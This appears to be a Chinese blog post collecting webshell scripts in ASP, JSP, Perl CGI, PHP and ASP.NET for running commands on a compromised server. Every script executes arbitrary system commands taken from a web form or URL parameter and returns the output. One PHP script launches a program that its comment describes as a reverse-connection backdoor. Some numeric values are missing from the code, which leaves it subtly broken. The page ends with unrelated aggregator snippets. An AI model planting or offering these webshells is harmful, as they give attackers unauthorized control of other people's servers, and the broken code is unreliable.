cmd1.asp

<object runat=server id=shell scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>

<%if err then%>

<object runat=server id=shell scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>

<% end if %>

<form method="post">

<input type=text name="cmdx" size= value="C:\Documents and Settings\All Users\cmd.exe"><br>

<input type=text name="cmd" size= value="<%=request.form("cmd")%>"><br>

<input type=submit value="cmd命令"></form>

<textarea readonly cols= rows=>

<%On Error Resume Next

if request.form("cmdx")="C:\Documents and Settings\All Users\cmd.exe" then

response.write shell.exec("cmd.exe /c"&request.form("cmd")).stdout.readall

end if

response.write shell.exec(request.form("cmdx")&" /c"&request.form("cmd")).stdout.readall

%>

</textarea>

cmd2.asp

<center><%response.write "<font size=4 color=red>shellapplication执行命令 无回显</font>" %>

<BR>程序所在的物理路径:

<%response.write request.servervariables("APPL_PHYSICAL_PATH")%> </center>

<html><title>shellapplication执行命令 by kyo327 </title>

<body><br/><center>

<form action="<%= Request.ServerVariables("URL") %>" method="POST">

<br>程序路径:<br/>

<input type=text name=text1 size= value="C:\Documents and Settings\All Users\Documents\cmd.exe"> <br/>

参数:<br/><input type=text name=text2 size= value="<%=canshu%>"><br/>

<input type=submit name=makelove value=运行>

</form> </center></body> </html>

<%

appnames = Request.Form("text1")

canshu = Request.Form("text2")

if appnames<>"" then

set kyoshell=createobject("shell.application")

kyoshell.ShellExecute appnames,canshu,"","open",

response.write "<center>执行成功!</center>"

end if

%>

cmd.jsp

<%@ page import="java.io.*" %>

<%

    try {

            String cmd = request.getParameter("cmd");

            Process child = Runtime.getRuntime().exec(cmd);

            InputStream in = child.getInputStream();

            int c;

            while ((c = in.read()) != -1) {

                out.print((char)c);

            }

            in.close();

            try {

                child.waitFor();

            } catch (InterruptedException e) {

                e.printStackTrace();

            }

        } catch (IOException e) {

            System.err.println(e);

        }

%>

cmd.cgi

#!/usr/bin/perl

read(STDIN,$POST,$ENV{'CONTENT_LENGTH'});

($key,$command)=split(/=/,$POST);

$command=~s/%([a-fA-f0-][a-fA-f0-])/pack("C",hex($))/eg;

$command=~s/\+/ /;

$output=system "$command>a.txt";

$output=~s/\n/\<br\>/;

print "Content-Type: text/html\n\n";

print <<EOF;

<form action="" method=POST>

<input type=text size= name=command value=""><br>

<input type=submit value=ok>

</form>

EOF

open(OUTPUT,"a.txt")||die "cannot open $!";

@output=<OUTPUT>;

print <<EOF;

<textarea name="textfield" cols="80" rows="60">@output</textarea>

EOF

close OUTPUT;

unlink ("a.txt");

exit;

cmd.cfm

#!/usr/bin/perl

read(STDIN,$POST,$ENV{'CONTENT_LENGTH'});

($key,$command)=split(/=/,$POST);

$command=~s/%([a-fA-f0-][a-fA-f0-])/pack("C",hex($))/eg;

$command=~s/\+/ /;

$output=system "$command>a.txt";

$output=~s/\n/\<br\>/;

print "Content-Type: text/html\n\n";

print <<EOF;

<form action="" method=POST>

<input type=text size= name=command value=""><br>

<input type=submit value=ok>

</form>

EOF

open(OUTPUT,"a.txt")||die "cannot open $!";

@output=<OUTPUT>;

print <<EOF;

<textarea name="textfield" cols="80" rows="60">@output</textarea>

EOF

close OUTPUT;

unlink ("a.txt");

exit;

cmd1.php

<?php

        if (key($_GET)=="system") {

            system($_GET['system']);

        } elseif (key($_GET)=="passthru") {

            passthru($_GET['passthru']);

        } elseif (key($_GET)=="exec") {

            $result = exec($_GET['exec']);

            echo $result;

        } elseif (key($_GET)=="shell_exec") {

            $result=shell_exec($_GET['shell_exec']);

            echo $result;

        } elseif (key($_GET)=="popen") {

            $pp = popen($_GET['popen'], 'r');

            $read = fread($pp, 2096);

            echo $read;

            pclose($pp);

        } elseif (key($_GET)=="wscript") {

            $wsh = new COM('WScript.shell') or die("PHP Create COM wscript.shell failed");

            $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_GET['wscript']."");

            $stdout = $exec->StdOut();

            $stroutput = $stdout->ReadAll();

            echo $stroutput;

        } elseif(key($_GET)=="proc_open"){

$descriptorspec = array(

   0 => array("pipe", "r"),

   1 => array("pipe", "w"),

   2 => array("pipe", "w")

);

$process = proc_open("C:\\Docume~1\\alluse~1\\Documents\\cmd.exe", $descriptorspec, $pipes);

if (is_resource($process)) {

    fwrite($pipes[0], "".$_GET['proc_open']."\r\n");

    fwrite($pipes[0], "exit\r\n");

    fclose($pipes[0]);

    while (!feof($pipes[1])) {

        echo fgets($pipes[1], 1024);

    }

    fclose($pipes[1]);

    while (!feof($pipes[2])) {

        echo fgets($pipes[2], 1024);

      }

    fclose($pipes[2]);

    proc_close($process);

}}

?>

cmd2.php

<?php

$wsh = new COM('Shell.Application') or die("Shell.Application");

$exec = $wsh->open("C:\\Docume~1\\alluse~1\\Documents\\fanlian.exe");

//没有回显,多了个fanlian进程,可以直接执行一个反向连接程序反弹回来

?>

cmd1.aspx

<%@ Page Language="c#" validateRequest = "false" aspcompat = "true" %>

<html xmlns="http://www.w3.org/1999/xhtml" >

<head id="Head1" runat="server">

<title>cmdshell</title></head>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<script language="C#" runat="server">

  void Button_Click1(object sender, EventArgs e)

    {

        try

        {

            Process shell = new Process();

            shell.StartInfo.FileName = PathTextBox.Text;

            shell.StartInfo.Arguments = ShellTextBox.Text;

            shell.StartInfo.UseShellExecute = false;

            shell.StartInfo.RedirectStandardInput = true;

            shell.StartInfo.RedirectStandardOutput = true;

            shell.StartInfo.RedirectStandardError = true;

            shell.Start();

            string str1 = shell.StandardOutput.ReadToEnd();

            str1 = str1.Replace("<", "&lt;");

            str1 = str1.Replace(">", "&gt;");

            myLabel.Text = "<hr><pre>" + str1 + "</pre>";

        }

        catch (Exception Error)

        {

            Bin_Error(Error.Message);

        }

    }

</script>

<body>

<center><font size= color=red>asp.net命令执行 by kyo</font><br /></center>

<form id="form1" runat="server"><div style="text-align: center">

<asp:Panel ID="CmdPanel" runat="server" Height="50px" Width="800px"><hr />

程序路径 :<asp:TextBox ID="PathTextBox" runat="server" Width="395px">C:\Documents and Settings\All Users\Documents\cmd.exe</asp:TextBox><br />

命令参数 :<asp:TextBox ID="ShellTextBox" runat="server" Width="395px">/c ver</asp:TextBox><br />

<asp:Button ID="RunButton" runat="server" OnClick="Button_Click1" Text="运行" /></div>

<div style="text-align: left">

<asp:Label ID="myLabel" runat="server" EnableViewState="False"></asp:Label></div>

<hr /></asp:Panel></form></body>

</html>

cmd2.aspx

<%@ Page Language="VB" validateRequest = "false" aspcompat = "true" Debug="true"%>

<script runat="server">

sub run(Src As Object, E As EventArgs)

         Dim StrResult As String

         Dim shell As Object

         shell = Server.CreateObject("WScript.Shell")

         StrResult = shell.exec( path.Text & " /c " & box.Text ).stdout.readall

         StrResult =  Replace(StrResult , "<","&lt;")

         StrResult =  Replace(StrResult , ">","&gt;")

         ResultLabel.Text = "<pre>" & StrResult & "</pre>"

end sub

</script>

<html><head></head><body>

<form runat="server">

程序路径:<asp:TextBox ID="path" Width="" Text="C:\Documents and Settings\All Users\Documents\cmd.exe"

runat="server" />

<br>命令参数:<asp:TextBox ID="box" Width="" runat="server" />

<asp:Button ID="Button" Text="Run" OnClick="run" runat="server" /><br>

<asp:Label ID="ResultLabel" runat="server" />

</form></body></html>

cmd3.aspx

<!--

Titel:  shell.application

Author: kyo327

Date:  --

-->

<%@ Page Language="VB" validateRequest = "false" aspcompat = "true" %>

<script runat="server">

sub run(Src As Object, E As EventArgs)

        Dim appName As String

        Dim appArgs As String

        Dim love As Object

        love = Server.CreateObject("Shell.Application")

        appName = appnames.Text

        appArgs = canshu.Text

        love.ShellExecute(appName, appArgs, "", "open", )

end sub

</script><html>

<head><title>shellapplication For ASP.NET By kyo327</title></head>

<body><form id="Form1" runat="server">

<center><font color=red size=>利用shell.application执行命令for asp.net</font><br />

<br>程序路径名:<br />

<asp:TextBox ID="appnames" Width="" Text="C:\Documents and Settings\All Users\Documents\cmd.exe" runat="server" />  <br>参数:<br />

<asp:TextBox ID="canshu" Width="" runat="server" /> <br /><br />

<asp:Button ID="Button" Text="运行" OnClick="run" runat="server" /><br>

</form></center></body></html>

webshell下执行命令脚本汇集的更多相关文章

  1. 在shell下执行命令的方法

    在shell下执行命令的方法 1. #!/bin/sh 语法:在shell.sh的开头写入 #!/bin/sh 一般的shell脚本就是这种用法.这种方法调用脚本开头的shell执行命令,子shell ...

  2. expect实现远程主机自动执行命令脚本

    2014年第一个脚本,哈哈!!! expect实现远程主机自动执行命令脚本: #!/usr/bin/expect -- if { [llength $argv] < 4 } { puts &qu ...

  3. MySQL命令行下执行.sql脚本详解

    本文主要介绍一个在MySQL命令行下执行脚本文件的例子,通过这个例子让我们来了解一下在命令行下MySQL是怎样执行脚本的吧.现在我们开始介绍这一过程. 1.首先编写sql脚本,保存为的:book.sq ...

  4. Linux 下执行Shell 脚本的方式

    Shell 脚本的执行方式通常有如下三种: (1)bash script-name 或者 sh script-name:(2)path/script-name或者./script-name:(3)so ...

  5. 解决方法:loadrunner 场景下执行webservice脚本是---报错10492 Error: Exception was raised when calling per-process-init function in extens

    在vug下执行时,脚本无异常,但是在controller下执行时报下面错误,网上查了下,解决方法千奇百怪,但无一可行. 分析了下错误,似乎是初始化进程有关.想到rts中的设置习惯时以线程方式执行. 遂 ...

  6. 在Linux下执行Jmeter脚本

    前言 Jmeter这款接口测试工具,已经在越来越多的公司被要求会使用了. 而且,现在应该部分小伙伴们都开始用起来了. 但是,你们知道除了在Windows用图形化界面的Jmeter执行脚本之外,还有其他 ...

  7. 曲演杂坛--SQLCMD下执行命令失败但没有任何错误提示的坑

    今天使用SQLCMD导入到SQL SERVER数据库中,看着数据文件都成功执行,但是意外发现有一个文件数据没有成功导入,但执行不报错,很容易导致问题被忽略. 使用存在问题的文件做下测试,从界面上看几行 ...

  8. shell中使用expect命令进行远程执行命令脚本

    expect是用来实现自动交互功能的工具之一,使用expect-send来实现交互过程. 注意: 1.脚本的执行方法与bash shell不一样,比如:expect example.sh 2.向一个脚 ...

  9. linux下执行sh脚本,提示Command not found解决办法

    1.确保用户对文件有读写及执行权限 oracle@linux-106:~/RMAN/bin> chmod a+x test.sh 2.然后修改文件格式(如果是从winodws搬过来的会显示dos ...

随机推荐

  1. Atom 和 markdown 基本使用

    Atom 和 markdown 基本使用 Atom 常用的快捷键 Cmd + Shift + P 打开命令窗口,可以运行各种菜单功能. Cmd + T 快速的多文件切换 Ctrl + G 文件内跳转到 ...

  2. 【T_SQL】 基础 续+++

    十五.T-SQL 编程 1.变量 (1)局部变量                    A.局部变量必须以标记@作为前缀 ,如@age.                    B.局部变量的使用也是先 ...

  3. LoadRunner 脚本学习 -- 随机函数运用

    直接上码 Action() { int randnum; randnum = rand()%+; lr_output_message("随机得到的数是:%d", randnum); ...

  4. 【架构】MVP模型

    MVP模型一般要创建三个文件夹:View.Interactor(Model).Presenter 每个部分都有其接口和实现类,就是为了方便回调 这里做一个登陆界面为例子: 接口: Interactor ...

  5. C语言中float如何存储?

    float 内存如何存储的 类型 存储位数 总位数 偏移值 (offset) 数符(S) 阶码(E) 尾数(M) 短实数(float) 1 8 23 32 127 长实数(double) 1 11 5 ...

  6. Uva 699The Falling Leaves

    0.唔.这道题 首先要明确根节点在哪儿 初始化成pos=maxn/2; 1.因为是先序的输入方法,所以这个建树的方法很重要 void build(int p) { int v; cin>> ...

  7. PHP学习之字符串

    1.字符串变量用于存储并处理文本: 2.字符串变量用于包含有字符的值,在创建字符串后,就可以对它进行操作了,可以直接在函数中使用字符串,或把它存储在变量中: <?php $txt="H ...

  8. 《DSP using MATLAB》示例Example4.13

    代码: b = [1, 0, -1]; a = [1, 0, -0.81]; % [R, p, C] = residuez(b,a); Mp = (abs(p))' Ap = (angle(p))'/ ...

  9. BZOJ4607 : [PA2015 Final]Edycja

    显然做完操作$2$后再做操作$1$. 建立一个$26$个点的有向图,每个点只有一条出边,$i$->$j$表示$i$最终变成了$j$,边权为一开始是$i$,最后不是$j$的位置个数,如果$i\ne ...

  10. [转]Maven实现直接部署Web项目到Tomcat7

    From:http://my.oschina.net/angel243/blog/178554 http://yuandingjiema.iteye.com/blog/1752544 以前在项目中很少 ...